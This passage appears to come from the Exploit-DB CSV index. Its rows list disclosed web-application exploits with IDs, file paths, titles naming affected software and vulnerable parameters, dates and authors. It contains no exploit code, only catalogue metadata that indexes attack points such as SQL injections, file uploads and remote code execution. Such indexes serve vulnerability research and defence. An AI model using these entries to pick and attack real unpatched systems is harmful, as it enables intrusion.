'todooforum.php' Multiple Cross-Site Scripting Vulnerabilities",2013-04-14,"Chiekh Bouchenafa",php,webapps, -38477,exploits/php/webapps/38477.txt,"Todoo Forum 2.0 - 'todooforum.php' Multiple SQL Injections",2013-04-14,"Chiekh Bouchenafa",php,webapps, -38458,exploits/php/webapps/38458.txt,"WordPress Plugin Spider Video Player - 'theme' SQL Injection",2013-04-11,"Ashiyane Digital Security Team",php,webapps, -38459,exploits/php/webapps/38459.txt,"Request Tracker - 'ShowPending' SQL Injection",2013-04-11,cheki,php,webapps, -38460,exploits/jsp/webapps/38460.txt,"jPlayer - 'Jplayer.swf' Script Cross-Site Scripting",2013-03-29,"Malte Batram",jsp,webapps, -38461,exploits/java/webapps/38461.txt,"Hero Framework - '/users/login?Username' Cross-Site Scripting",2013-04-10,"High-Tech Bridge",java,webapps, -38462,exploits/java/webapps/38462.txt,"Hero Framework - '/users/forgot_password?error' Cross-Site Scripting",2013-04-10,"High-Tech Bridge",java,webapps, -38463,exploits/multiple/webapps/38463.txt,"Aibolit - Information Disclosure",2013-04-13,MustLive,multiple,webapps, -38470,exploits/hardware/webapps/38470.txt,"netis RealTek Wireless Router / ADSL Modem - Multiple Vulnerabilities",2015-10-15,"Karn Ganeshen",hardware,webapps, -38471,exploits/hardware/webapps/38471.txt,"PROLiNK H5004NK ADSL Wireless Modem - Multiple Vulnerabilities",2015-10-15,"Karn Ganeshen",hardware,webapps, -38478,exploits/php/webapps/38478.txt,"Sosci Survey - Multiple Vulnerabilities",2013-04-17,"T. Lazauninkas",php,webapps, -38479,exploits/asp/webapps/38479.txt,"Matrix42 Service Store - 'default.aspx' Cross-Site Scripting",2013-03-06,43zsec,asp,webapps, -38480,exploits/php/webapps/38480.txt,"Fork CMS - 'js.php' Local File Inclusion",2013-04-18,"Rafay Baloch",php,webapps, -38482,exploits/php/webapps/38482.txt,"Crafty Syntax Live Help 3.1.2 - Remote File Inclusion / Full Path Disclosure",2013-04-19,ITTIHACK,php,webapps, -38484,exploits/php/webapps/38484.rb,"WordPress Plugin Ajax Load More < 2.8.2 - Arbitrary File Upload",2015-10-18,PizzaHatHacker,php,webapps, -38487,exploits/php/webapps/38487.txt,"WordPress Theme Colormix - Multiple Vulnerabilities",2013-04-21,MustLive,php,webapps, -38488,exploits/hardware/webapps/38488.txt,"Belkin N150 Router 1.00.08/1.00.09 - Directory Traversal",2015-10-19,"Rahul Pratap Singh",hardware,webapps, -38491,exploits/php/webapps/38491.php,"SMF - '/index.php' HTML Injection / Multiple PHP Code Injection Vulnerabilities",2013-04-23,"Jakub Galczyk",php,webapps, -38494,exploits/php/webapps/38494.txt,"WordPress Plugin WP Super Cache - PHP Remote Code Execution",2013-04-24,anonymous,php,webapps, -38496,exploits/php/webapps/38496.txt,"RealtyScript 4.0.2 - Multiple Cross-Site Request Forgery / Persistent Cross-Site Scripting Vulnerabilities",2015-10-19,LiquidWorm,php,webapps, -38497,exploits/php/webapps/38497.txt,"RealtyScript 4.0.2 - Multiple Blind SQL Injections",2015-10-19,LiquidWorm,php,webapps, -38499,exploits/php/webapps/38499.html,"PHPValley Micro Jobs Site Script - Spoofing",2013-04-27,"Jason Whelan",php,webapps, -38506,exploits/php/webapps/38506.txt,"NetApp OnCommand System Manager - '/zapiServlet' CIFS Configuration Management Interface Multiple Cross-Site Scripting Vulnerabilities",2013-05-07,"M. Heinzl",php,webapps, -38507,exploits/php/webapps/38507.txt,"NetApp OnCommand System Manager - '/zapiServlet' User Management Interface Multiple Cross-Site Scripting Vulnerabilities",2013-05-07,"M. Heinzl",php,webapps, -38508,exploits/php/webapps/38508.txt,"MyBB Game Section Plugin - 'games.php' Multiple Cross-Site Scripting Vulnerabilities",2013-05-07,anonymous,php,webapps, -38509,exploits/php/webapps/38509.txt,"Securimage - 'example_form.php' Cross-Site Scripting",2013-05-10,"Gjoko Krstic",php,webapps, -38510,exploits/php/webapps/38510.txt,"WordPress Plugin Securimage-WP - 'siwp_test.php' Cross-Site Scripting",2013-05-11,"Gjoko Krstic",php,webapps, -38511,exploits/php/webapps/38511.txt,"Gallery Server Pro - Arbitrary File Upload",2013-05-14,"Drew Calcott",php,webapps, -38514,exploits/hardware/webapps/38514.py,"Beckhoff CX9020 CPU Module - Remote Code Execution",2015-10-22,Photubias,hardware,webapps, -38515,exploits/php/webapps/38515.txt,"WordPress Plugin wp-FileManager - 'path' Arbitrary File Download",2013-05-15,ByEge,php,webapps, -38516,exploits/php/webapps/38516.txt,"Open Flash Chart - 'get-data' Cross-Site Scripting",2013-05-14,"Deepankar Arora",php,webapps, -38517,exploits/php/webapps/38517.html,"WordPress Plugin Mail On Update - Cross-Site Request Forgery",2013-05-16,"Henri Salo",php,webapps, -38518,exploits/php/webapps/38518.txt,"Jojo CMS - 'search' Cross-Site Scripting",2013-05-15,"High-Tech Bridge SA",php,webapps, -38519,exploits/php/webapps/38519.txt,"Jojo CMS - 'x-forwarded-for' HTTP header SQL Injection",2013-05-15,"High-Tech Bridge SA",php,webapps, -38520,exploits/php/webapps/38520.html,"WordPress Plugin WP Cleanfix - Cross-Site Request Forgery",2013-05-16,"Enigma Ideas",php,webapps, -38523,exploits/php/webapps/38523.txt,"Weyal CMS - Multiple SQL Injections",2013-05-23,XroGuE,php,webapps, -38524,exploits/php/webapps/38524.pl,"Matterdaddy Market - Multiple Vulnerabilities",2013-05-24,KedAns-Dz,php,webapps, -38525,exploits/php/webapps/38525.txt,"Subrion 3.X.x - Multiple Vulnerabilities",2015-10-23,bRpsd,php,webapps, -38527,exploits/php/webapps/38527.txt,"Joomla! Component Realtyna RPL 8.9.2 - Multiple SQL Injections",2015-10-23,"Bikramaditya Guha",php,webapps, -38528,exploits/php/webapps/38528.txt,"Joomla! Component Realtyna RPL 8.9.2 - Persistent Cross-Site Scripting / Cross-Site Request Forgery",2015-10-23,"Bikramaditya Guha",php,webapps, -38572,exploits/php/webapps/38572.txt,"PHP Server Monitor 3.1.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2015-10-30,hyp3rlinx,php,webapps, -38534,exploits/php/webapps/38534.php,"Joomla! 3.2.x < 3.4.4 - SQL Injection",2015-10-26,"Manish Tanwar",php,webapps, -38645,exploits/jsp/webapps/38645.txt,"NXFilter 3.0.3 - Cross-Site Request Forgery",2015-11-06,hyp3rlinx,jsp,webapps, -38543,exploits/php/webapps/38543.txt,"PHP4dvd - 'config.php' PHP Code Injection",2012-05-31,"CWH Underground",php,webapps, -38544,exploits/php/webapps/38544.txt,"Elastix - Multiple Cross-Site Scripting Vulnerabilities",2013-05-28,cheki,php,webapps, -38545,exploits/php/webapps/38545.txt,"Telaen 2.7.x - Cross-Site Scripting",2013-06-04,"Manuel García Cárdenas",php,webapps, -38546,exploits/php/webapps/38546.txt,"Telaen 2.7.x - Open Redirection",2013-06-04,"Manuel García Cárdenas",php,webapps, -38547,exploits/php/webapps/38547.txt,"CMS Gratis Indonesia - 'config.php' PHP Code Injection",2013-06-04,"CWH Underground",php,webapps, -38548,exploits/php/webapps/38548.txt,"Telaen - Information Disclosure",2013-06-03,"Manuel García Cárdenas",php,webapps, -38550,exploits/cgi/webapps/38550.txt,"QNAP VioStor NVR / QNAP NAS - Remote Code Execution",2013-06-05,"Tim Herres",cgi,webapps, -38551,exploits/java/webapps/38551.py,"JIRA and HipChat for JIRA Plugin - Velocity Template Injection",2015-10-28,"Chris Wood",java,webapps, -38553,exploits/hardware/webapps/38553.txt,"Sagem FAST3304-V2 - Authentication Bypass (2)",2015-10-28,"Soufiane Alami Hassani",hardware,webapps, -38560,exploits/php/webapps/38560.txt,"Caucho Resin - '/resin-admin/' URI Cross-Site Scripting",2013-06-07,"Gjoko Krstic",php,webapps, -38561,exploits/php/webapps/38561.txt,"Caucho Resin - 'index.php?logout' Cross-Site Scripting",2013-06-07,"Gjoko Krstic",php,webapps, -38562,exploits/php/webapps/38562.txt,"HP Insight Diagnostics - Remote Code Injection",2013-06-10,"Markus Wulftange",php,webapps, -38563,exploits/php/webapps/38563.txt,"HP Insight Diagnostics 9.4.0.4710 - Local File Inclusion",2013-06-10,"Markus Wulftange",php,webapps, -38565,exploits/php/webapps/38565.txt,"Joomla! Component com_jnews 8.5.1 - SQL Injection",2015-10-29,"Omer Ramić",php,webapps,80 -38567,exploits/php/webapps/38567.txt,"Max Forum - Multiple Vulnerabilities",2013-06-09,"CWH Underground",php,webapps, -38568,exploits/php/webapps/38568.txt,"WordPress Theme Ambience - 'src' Cross-Site Scripting",2013-06-09,Darksnipper,php,webapps, -38569,exploits/php/webapps/38569.txt,"Lokboard - 'index_4.php' PHP Code Injection",2013-06-10,"CWH Underground",php,webapps, -38570,exploits/php/webapps/38570.txt,"ScriptCase - 'scelta_categoria.php' SQL Injection",2013-06-10,"Hossein Hezami",php,webapps, -38571,exploits/php/webapps/38571.txt,"mkCMS - 'index.php' Arbitrary PHP Code Execution",2013-06-11,"CWH Underground",php,webapps, -38573,exploits/php/webapps/38573.txt,"eBay Magento 1.9.2.1 - PHP FPM XML eXternal Entity Injection",2015-10-30,"Dawid Golunski",php,webapps, -38574,exploits/php/webapps/38574.html,"PHP Server Monitor 3.1.1 - Cross-Site Request Forgery / Privilege Escalation",2015-10-30,hyp3rlinx,php,webapps, -38575,exploits/hardware/webapps/38575.txt,"Hitron Router CGN3ACSMR 4.5.8.16 - Arbitrary Code Execution",2015-10-30,"Dolev Farhi",hardware,webapps, -38577,exploits/php/webapps/38577.txt,"Pligg CMS 2.0.2 - Multiple SQL Injections",2015-10-30,"Curesec Research Team",php,webapps, -38578,exploits/php/webapps/38578.txt,"Pligg CMS 2.0.2 - Directory Traversal",2015-10-30,"Curesec Research Team",php,webapps, -38579,exploits/php/webapps/38579.txt,"Pligg CMS 2.0.2 - Cross-Site Request Forgery / Code Execution",2015-10-30,"Curesec Research Team",php,webapps, -38581,exploits/php/webapps/38581.txt,"Oxwall 1.7.4 - Cross-Site Request Forgery",2015-10-30,"High-Tech Bridge SA",php,webapps, -38585,exploits/php/webapps/38585.pl,"WordPress Plugin NextGEN Gallery - 'upload.php' Arbitrary File Upload",2013-06-12,"Marcos Garcia",php,webapps, -38588,exploits/php/webapps/38588.php,"BloofoxCMS - 'index.php' Arbitrary File Upload",2013-06-17,"CWH Underground",php,webapps, -38590,exploits/php/webapps/38590.txt,"et-chat - Privilege Escalation / Arbitrary File Upload",2013-06-18,MR.XpR,php,webapps, -38592,exploits/php/webapps/38592.php,"Joomla! Component com_rokdownloads - Arbitrary File Upload",2013-06-19,Am!r,php,webapps, -38593,exploits/cgi/webapps/38593.txt,"FtpLocate - HTML Injection",2013-06-24,Chako,cgi,webapps, -38594,exploits/php/webapps/38594.txt,"Barnraiser Prairie - 'get_file.php' Directory Traversal",2013-06-25,prairie,php,webapps, -38596,exploits/php/webapps/38596.txt,"Xaraya - Multiple Cross-Site Scripting Vulnerabilities",2013-06-26,"High-Tech Bridge",php,webapps, -38598,exploits/php/webapps/38598.txt,"ZamFoo - 'date' Remote Command Injection",2013-06-15,localhost.re,php,webapps, -38602,exploits/windows/webapps/38602.txt,"actiTIME 2015.2 - Multiple Vulnerabilities",2015-11-02,LiquidWorm,windows,webapps, -38604,exploits/hardware/webapps/38604.txt,"Mobile USB Drive HD - Multiple Local File Inclusion / Arbitrary File Upload Vulnerabilities",2012-06-28,"Benjamin Kunz Mejri",hardware,webapps, -38605,exploits/php/webapps/38605.txt,"Nameko - 'nameko.php' Cross-Site Scripting",2013-06-29,"Andrea Menin",php,webapps, -38606,exploits/php/webapps/38606.txt,"WordPress Plugin WP Private Messages - 'msgid' SQL Injection",2013-06-29,"IeDb ir",php,webapps, -38607,exploits/php/webapps/38607.txt,"Atomy Maxsite - 'index.php' Arbitrary File Upload",2013-06-30,Iranian_Dark_Coders_Team,php,webapps, -38608,exploits/php/webapps/38608.txt,"WordPress Plugin Xorbin Analog Flash Clock - 'widgetUrl' Cross-Site Scripting",2013-06-30,"Prakhar Prasad",php,webapps, -38630,exploits/php/webapps/38630.html,"phpVibe 3.1 - Information Disclosure / Remote File Inclusion",2013-07-06,indoushka,php,webapps, -38621,exploits/php/webapps/38621.txt,"WordPress Plugin Xorbin Digital Flash Clock - 'widgetUrl' Cross-Site Scripting",2013-06-30,"Prakhar Prasad",php,webapps, -38624,exploits/php/webapps/38624.txt,"WordPress Plugin WP Feed - 'nid' SQL Injection",2013-07-02,"Iranian Exploit DataBase",php,webapps, -38625,exploits/php/webapps/38625.txt,"WordPress Plugin Category Grid View Gallery - 'ID' Cross-Site Scripting",2013-07-02,"Iranian Exploit DataBase",php,webapps, -38628,exploits/php/webapps/38628.txt,"HostBill - 'cpupdate.php' Authentication Bypass",2013-05-29,localhost.re,php,webapps, -38629,exploits/php/webapps/38629.txt,"vBulletin 5.1.x - Unauthenticated Remote Code Execution",2015-11-05,hhjj,php,webapps, -38642,exploits/php/webapps/38642.txt,"S9Y Serendipity 1.6.2 - 'serendipity_admin_image_selector.php' Cross-Site Scripting",2013-07-12,"Omar Kurt",php,webapps, -38635,exploits/php/webapps/38635.txt,"iVote - 'details.php' SQL Injection",2013-07-10,"Ashiyane Digital Security Team",php,webapps, -38638,exploits/php/webapps/38638.txt,"Mintboard - Multiple Cross-Site Scripting Vulnerabilities",2013-07-10,"Canberk BOLAT",php,webapps, -38639,exploits/php/webapps/38639.txt,"WordPress Plugin miniBB - SQL Injection / Multiple Cross-Site Scripting Vulnerabilities",2013-07-11,Netsparker,php,webapps, -38640,exploits/multiple/webapps/38640.rb,"OpenSSL - Alternative Chains Certificate Forgery",2015-11-05,"Ramon de C Valle",multiple,webapps, -38641,exploits/multiple/webapps/38641.rb,"JSSE - SKIP-TLS",2015-11-05,"Ramon de C Valle",multiple,webapps, -38643,exploits/php/webapps/38643.txt,"WordPress Plugin Pie Register - 'wp-login.php' Multiple Cross-Site Scripting Vulnerabilities",2013-07-12,gravitylover,php,webapps, -38646,exploits/jsp/webapps/38646.txt,"NXFilter 3.0.3 - Multiple Cross-Site Scripting Vulnerabilities",2015-11-06,hyp3rlinx,jsp,webapps, -38648,exploits/php/webapps/38648.txt,"WordPress Plugin My Calendar 2.4.10 - Multiple Vulnerabilities",2015-11-06,Mysticism,php,webapps, -38649,exploits/php/webapps/38649.txt,"Google AdWords API PHP client library 6.2.0 - Arbitrary PHP Code Execution",2015-11-07,"Dawid Golunski",php,webapps, -38651,exploits/php/webapps/38651.txt,"eBay Magento CE 1.9.2.1 - Unrestricted Cron Script (Code Execution / Denial of Service)",2015-11-07,"Dawid Golunski",php,webapps, -38652,exploits/php/webapps/38652.txt,"Google AdWords 6.2.0 API client libraries - XML eXternal Entity Injection",2015-11-07,"Dawid Golunski",php,webapps, -38653,exploits/asp/webapps/38653.txt,"Corda Highwire - 'Highwire.ashx' Full Path Disclosure",2013-07-12,"Adam Willard",asp,webapps, -38654,exploits/php/webapps/38654.txt,"OpenEMR 4.1 - 'note' HTML Injection",2013-07-12,"Nate Drier",php,webapps, -38655,exploits/asp/webapps/38655.txt,"Corda .NET Redirector - 'redirector.corda' Cross-Site Scripting",2013-07-12,"Adam Willard",asp,webapps, -38656,exploits/php/webapps/38656.html,"PrestaShop - Multiple Cross-Site Request Forgery Vulnerabilities",2013-07-11,"EntPro Cyber Security Research Group",php,webapps, -38657,exploits/hardware/webapps/38657.html,"Arris TG1682G Modem - Persistent Cross-Site Scripting",2015-11-09,Nu11By73,hardware,webapps, -38661,exploits/php/webapps/38661.txt,"TestLink 1.9.14 - Cross-Site Request Forgery",2015-11-09,"Aravind C Ajayan_ Balagopal N",php,webapps, -38664,exploits/java/webapps/38664.py,"Jenkins 1.633 - Unauthenticated Credential Recovery",2015-11-10,"The Repo",java,webapps, -38665,exploits/php/webapps/38665.txt,"YesWiki 0.2 - 'template' Directory Traversal",2015-11-10,HaHwul,php,webapps, -38684,exploits/php/webapps/38684.txt,"R-Scripts Vacation Rental Script 7R - Multiple Vulnerabilities",2015-11-12,LiquidWorm,php,webapps, -38673,exploits/php/webapps/38673.txt,"Collabtive - Multiple Vulnerabilities",2013-07-22,"Enrico Cinquini",php,webapps, -38674,exploits/php/webapps/38674.txt,"WordPress Plugin FlagEm - 'cID' Cross-Site Scripting",2013-07-22,"IeDb ir",php,webapps, -38675,exploits/php/webapps/38675.html,"Magnolia CMS - Multiple Cross-Site Scripting Vulnerabilities",2013-07-24,"High-Tech Bridge",php,webapps, -38676,exploits/php/webapps/38676.txt,"WordPress Plugin Duplicator - Cross-Site Scripting",2013-07-24,"High-Tech Bridge",php,webapps, -38677,exploits/php/webapps/38677.txt,"vBulletin 4.0.2 - 'update_order' SQL Injection",2013-07-24,n3tw0rk,php,webapps, -38678,exploits/php/webapps/38678.txt,"WordPress Plugin WP Fastest Cache 0.8.4.8 - Blind SQL Injection",2015-11-11,"Kacper Szurek",php,webapps, -38679,exploits/php/webapps/38679.txt,"Alienvault Open Source SIEM (OSSIM) - Multiple Cross-Site Scripting Vulnerabilities",2013-07-25,xistence,php,webapps, -38682,exploits/php/webapps/38682.txt,"Jahia xCM - '/engines/manager.jsp?site' Cross-Site Scripting",2013-07-31,"High-Tech Bridge",php,webapps, -38683,exploits/php/webapps/38683.txt,"Jahia xCM - '/administration/' Multiple Cross-Site Scripting Vulnerabilities",2013-07-31,"High-Tech Bridge",php,webapps, -38688,exploits/php/webapps/38688.txt,"b374k 3.2.3/2.8 (Web Shell) - Cross-Site Request Forgery / Command Injection",2015-11-13,hyp3rlinx,php,webapps, -38689,exploits/php/webapps/38689.txt,"Silverstripe CMS - 'MemberLoginForm.php' Information Disclosure",2013-08-01,"Fara Rustein",php,webapps, -38691,exploits/cgi/webapps/38691.txt,"Kwok Information Server - Multiple SQL Injections",2013-08-07,"Yogesh Phadtare",cgi,webapps, -38693,exploits/php/webapps/38693.txt,"Advanced Guestbook - 'addentry.php' Arbitrary File Upload",2013-08-08,"Ashiyane Digital Security Team",php,webapps, -38695,exploits/php/webapps/38695.txt,"CakePHP 2.2.8/2.3.7 - AssetDispatcher Class Local File Inclusion",2013-08-13,"Takeshi Terada",php,webapps, -38696,exploits/asp/webapps/38696.txt,"DotNetNuke 6.1.x - Cross-Site Scripting",2013-08-13,"Sajjad Pourali",asp,webapps, -38697,exploits/php/webapps/38697.txt,"ACal 2.2.6 - 'view' Local File Inclusion",2013-08-15,ICheer_No0M,php,webapps, -38698,exploits/php/webapps/38698.html,"CF Image Host 1.65 - Cross-Site Request Forgery",2015-11-16,hyp3rlinx,php,webapps, -38699,exploits/php/webapps/38699.txt,"CF Image Host 1.65 - PHP Command Injection",2015-11-16,hyp3rlinx,php,webapps, -38706,exploits/multiple/webapps/38706.txt,"VideoLAN VLC Media Player Web Interface 2.2.1 - Metadata Title Cross-Site Scripting",2015-11-16,"Andrea Sindoni",multiple,webapps, -38707,exploits/hardware/webapps/38707.txt,"D-Link DIR-816L Wireless Router - Cross-Site Request Forgery",2015-11-16,"Bhadresh Patel",hardware,webapps, -38709,exploits/php/webapps/38709.txt,"MCImageManager - Multiple Vulnerabilities",2013-07-16,MustLive,php,webapps, -38712,exploits/php/webapps/38712.txt,"Bo-Blog 2.1.1 - Cross-Site Scripting / SQL Injection",2013-08-20,"Ashiyane Digital Security Team",php,webapps, -38727,exploits/php/webapps/38727.txt,"AlegroCart 1.2.8 - Multiple SQL Injections",2015-11-16,"Curesec Research Team",php,webapps,80 -38728,exploits/php/webapps/38728.txt,"AlegroCart 1.2.8 - Local/Remote File Inclusion",2015-11-16,"Curesec Research Team",php,webapps,80 -38729,exploits/php/webapps/38729.txt,"ClipperCMS 1.3.0 - Multiple SQL Injections",2015-11-16,"Curesec Research Team",php,webapps,80 -38737,exploits/php/webapps/38737.txt,"Twilight CMS - DeWeS Web Server Directory Traversal",2013-08-21,"High-Tech Bridge",php,webapps, -38738,exploits/python/webapps/38738.txt,"Plone - 'in_portal.py' < 4.1.3 Session Hijacking",2013-07-31,"Cyrill Bannwart",python,webapps, -38739,exploits/java/webapps/38739.txt,"SearchBlox - Multiple Information Disclosure Vulnerabilities",2013-08-23,"Ricky Roane Jr",java,webapps, -38740,exploits/php/webapps/38740.txt,"cm3 Acora CMS - 'top.aspx' Information Disclosure",2013-08-26,"Pedro Andujar",php,webapps, -38744,exploits/php/webapps/38744.txt,"appRain CMF - Multiple Cross-Site Request Forgery Vulnerabilities",2013-08-29,"Yashar shahinzadeh",php,webapps, -38745,exploits/php/webapps/38745.txt,"Xibo - 'layout' HTML Injection",2013-08-21,"Jacob Holcomb",php,webapps, -38746,exploits/php/webapps/38746.html,"Xibo - Cross-Site Request Forgery",2013-08-21,"Jacob Holcomb",php,webapps, -38748,exploits/php/webapps/38748.txt,"dBlog CMS - 'm' SQL Injection",2013-09-03,ACC3SS,php,webapps, -38749,exploits/asp/webapps/38749.txt,"Flo CMS - 'archivem' SQL Injection",2013-09-03,ACC3SS,asp,webapps, -38750,exploits/php/webapps/38750.txt,"WordPress Plugin Users Ultra 1.5.50 - Unrestricted Arbitrary File Upload",2015-11-18,"Panagiotis Vagenas",php,webapps, -38753,exploits/php/webapps/38753.html,"WordPress Plugin Event Easy Calendar - Multiple Cross-Site Request Forgery Vulnerabilities",2013-09-07,anonymous,php,webapps, -38754,exploits/php/webapps/38754.txt,"eTransfer Lite - 'file name' HTML Injection",2013-09-10,"Benjamin Kunz Mejri",php,webapps, -38755,exploits/php/webapps/38755.txt,"WordPress Plugin mukioplayer4wp - 'cid' SQL Injection",2013-09-13,"Ashiyane Digital Security Team",php,webapps, -38756,exploits/php/webapps/38756.txt,"WordPress Plugin RokNewsPager - 'thumb.php' Multiple Vulnerabilities",2013-09-18,MustLive,php,webapps, -38757,exploits/php/webapps/38757.txt,"WordPress Plugin RokStories - 'thumb.php' Multiple Vulnerabilities",2013-09-17,MustLive,php,webapps, -38762,exploits/windows/webapps/38762.txt,"Netwin SurgeFTP Sever 23d6 - Persistent Cross-Site Scripting",2015-11-19,Un_N0n,windows,webapps, -38765,exploits/php/webapps/38765.txt,"Horde Groupware 5.2.10 - Cross-Site Request Forgery",2015-11-19,"High-Tech Bridge SA",php,webapps,80 -38767,exploits/php/webapps/38767.txt,"WordPress Plugin RokIntroScroller - 'thumb.php' Multiple Vulnerabilities",2013-09-19,MustLive,php,webapps, -38768,exploits/php/webapps/38768.txt,"WordPress Plugin RokMicroNews - 'thumb.php' Multiple Vulnerabilities",2013-09-19,MustLive,php,webapps, -38769,exploits/php/webapps/38769.txt,"Monstra CMS - 'login' SQL Injection",2013-09-20,linc0ln.dll,php,webapps, -38770,exploits/php/webapps/38770.txt,"MentalJS - Sandbox Security Bypass",2013-09-20,"Rafay Baloch",php,webapps, -38773,exploits/hardware/webapps/38773.txt,"ZTE ZXHN H108N R1A / ZXV10 W300 Routers - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",hardware,webapps, -38781,exploits/php/webapps/38781.txt,"Alienvault Open Source SIEM (OSSIM) 3.1 - 'date_from' Multiple SQL Injections",2013-10-02,"Yu-Chi Ding",php,webapps, -38803,exploits/php/webapps/38803.txt,"WordPress Plugin WP-Client 3.8.7 - Persistent Cross-Site Scripting",2015-11-24,"Pier-Luc Maltais",php,webapps,80 -38782,exploits/php/webapps/38782.php,"WordPress Plugin SEO Watcher - 'ofc_upload_image.php' Arbitrary PHP Code Execution",2013-10-03,wantexz,php,webapps, -38776,exploits/cgi/webapps/38776.txt,"Cambium ePMP 1000 - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",cgi,webapps, -38777,exploits/php/webapps/38777.txt,"Joomla! Component JVideoClip 1.5.1 - 'uid' SQL Injection",2013-09-21,SixP4ck3r,php,webapps, -38780,exploits/php/webapps/38780.txt,"Silverstripe CMS - Multiple HTML Injection Vulnerabilities",2013-09-23,"Benjamin Kunz Mejri",php,webapps, -38783,exploits/php/webapps/38783.php,"WordPress Plugin Woopra Analytics - 'ofc_upload_image.php' Arbitrary PHP Code Execution",2013-10-07,wantexz,php,webapps, -38784,exploits/php/webapps/38784.txt,"Alienvault Open Source SIEM (OSSIM) - 'Timestamp' Directory Traversal",2013-10-08,"Ding Yu-Chi",php,webapps, -38785,exploits/php/webapps/38785.pl,"vBulletin 4.1.x - '/install/upgrade.php' Security Bypass",2013-10-13,"Joshua Rogers",php,webapps, -38786,exploits/php/webapps/38786.txt,"Ziteman CMS - Login Page SQL Injection",2013-10-10,"Ashiyane Digital Security Team",php,webapps, -38790,exploits/php/webapps/38790.pl,"vBulletin 5.x - Remote Code Execution",2015-11-23,"Mohammad Reza Espargham",php,webapps,80 -38799,exploits/php/webapps/38799.txt,"Bilboplanet - 'auth.php' SQL Injection",2013-10-11,"Omar Kurt",php,webapps, -38800,exploits/php/webapps/38800.txt,"FreeSMS - '/pages/crc_handler.php?scheduleid' SQL Injection",2013-09-27,"Sarahma Security",php,webapps, -38801,exploits/php/webapps/38801.txt,"FreeSMS - '/pages/crc_handler.php' Multiple Cross-Site Scripting Vulnerabilities",2013-09-27,"Sarahma Security",php,webapps, -38806,exploits/cgi/webapps/38806.txt,"Bugzilla - 'editflagtypes.cgi' Multiple Cross-Site Scripting Vulnerabilities",2013-10-09,"Mateusz Goik",cgi,webapps, -38807,exploits/cgi/webapps/38807.txt,"Bugzilla 4.2 - Tabular Reports Cross-Site Scripting",2013-10-09,"Mateusz Goik",cgi,webapps, -38808,exploits/php/webapps/38808.txt,"WordPress Plugin WP-Realty - 'listing_id' SQL Injection",2013-10-08,Napsterakos,php,webapps, -38811,exploits/php/webapps/38811.txt,"WordPress Theme Daily Deal - Arbitrary File Upload",2013-10-23,DevilScreaM,php,webapps, -38814,exploits/php/webapps/38814.php,"Joomla! Component Maian15 - 'name' Arbitrary File Upload",2013-10-20,SultanHaikal,php,webapps, -38816,exploits/jsp/webapps/38816.html,"JReport - 'dealSchedules.jsp' Cross-Site Request Forgery",2013-10-25,"Poonam Singh",jsp,webapps, -38819,exploits/php/webapps/38819.txt,"Course Registration Management System - Cross-Site Scripting / SQL Injection",2013-10-21,"Omar Kurt",php,webapps, -38820,exploits/php/webapps/38820.php,"WordPress Theme This Way - 'upload_settings_image.php' Arbitrary File Upload",2013-11-01,Bet0,php,webapps, -38822,exploits/windows/webapps/38822.rb,"Sysaid Helpdesk Software 14.4.32 b25 - SQL Injection (Metasploit)",2015-11-28,hland,windows,webapps,8080 -38831,exploits/php/webapps/38831.txt,"HumHub 0.11.2/0.20.0-beta.2 - SQL Injection",2015-11-30,"LSE Leading Security Experts GmbH",php,webapps,80 -38828,exploits/php/webapps/38828.php,"Limonade Framework - 'limonade.php' Local File Disclosure",2013-11-17,"Yashar shahinzadeh",php,webapps, -38830,exploits/php/webapps/38830.txt,"MyCustomers CMS 1.3.873 - SQL Injection",2015-11-30,"Persian Hack Team",php,webapps,80 -38833,exploits/linux/webapps/38833.txt,"Kodi 15 - Web Interface Arbitrary File Access (",2015-12-01,"Machiel Pronk",linux,webapps, -38840,exploits/hardware/webapps/38840.txt,"Belkin N150 Wireless Router F9K1009 v1 - Multiple Vulnerabilities",2015-12-01,"Rahul Pratap Singh",hardware,webapps,80 -38841,exploits/php/webapps/38841.txt,"ZenPhoto 1.4.10 - Local File Inclusion",2015-12-01,hyp3rlinx,php,webapps,80 -38842,exploits/php/webapps/38842.txt,"Testa OTMS - Multiple SQL Injections",2013-11-13,"Ashiyane Digital Security Team",php,webapps, -38843,exploits/php/webapps/38843.txt,"TomatoCart 1.1.8.2 - 'class' Local File Inclusion",2013-11-18,Esac,php,webapps, -38836,exploits/multiple/webapps/38836.txt,"ntop-ng 2.0.151021 - Privilege Escalation",2015-12-01,"Dolev Farhi",multiple,webapps, -38837,exploits/php/webapps/38837.txt,"IP.Board 4.1.4.x - Persistent Cross-Site Scripting",2015-12-01,"Mehdi Alouache",php,webapps, -38844,exploits/php/webapps/38844.html,"WordPress Plugin Blue Wrench Video Widget - Cross-Site Request Forgery",2013-11-23,"Haider Mahmood",php,webapps, -38848,exploits/php/webapps/38848.php,"WordPress Theme Suco - 'themify-ajax.php' Arbitrary File Upload",2013-11-20,DevilScreaM,php,webapps, -38852,exploits/php/webapps/38852.pl,"PHPThumb - 'PHPThumb.php' Arbitrary File Upload",2013-12-01,DevilScreaM,php,webapps, -38853,exploits/hardware/webapps/38853.sh,"D-Link DIR-Series Routers - '/model/__show_info.php' Local File Disclosure",2013-12-02,tytusromekiatomek,hardware,webapps, -38855,exploits/php/webapps/38855.txt,"WordPress Plugin Users Ultra 1.5.50 - Blind SQL Injection",2015-12-03,"Panagiotis Vagenas",php,webapps, -38856,exploits/php/webapps/38856.txt,"WordPress Plugin Users Ultra 1.5.50 - Persistent Cross-Site Scripting",2015-12-03,"Panagiotis Vagenas",php,webapps, -38861,exploits/php/webapps/38861.txt,"WordPress Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion",2015-12-03,"High-Tech Bridge SA",php,webapps, -38862,exploits/php/webapps/38862.txt,"Enorth Webpublisher CMS - 'thisday' SQL Injection",2013-12-06,xin.wang,php,webapps, -38863,exploits/php/webapps/38863.php,"NeoBill - '/modules/nullregistrar/PHPwhois/example.php?query' Remote Code Execution",2013-12-06,KedAns-Dz,php,webapps, -38864,exploits/php/webapps/38864.php,"NeoBill - '/install/include/solidstate.php' Multiple SQL Injections",2013-12-06,KedAns-Dz,php,webapps, -38865,exploits/php/webapps/38865.txt,"NeoBill 0.9-alpha - 'language' Local File Inclusion",2013-12-06,KedAns-Dz,php,webapps, -39563,exploits/php/webapps/39563.txt,"Kaltura Community Edition < 11.1.0-2 - Multiple Vulnerabilities",2016-03-15,Security-Assessment.com,php,webapps,80 -38867,exploits/php/webapps/38867.txt,"WordPress Plugin Advanced uploader 2.10 - Multiple 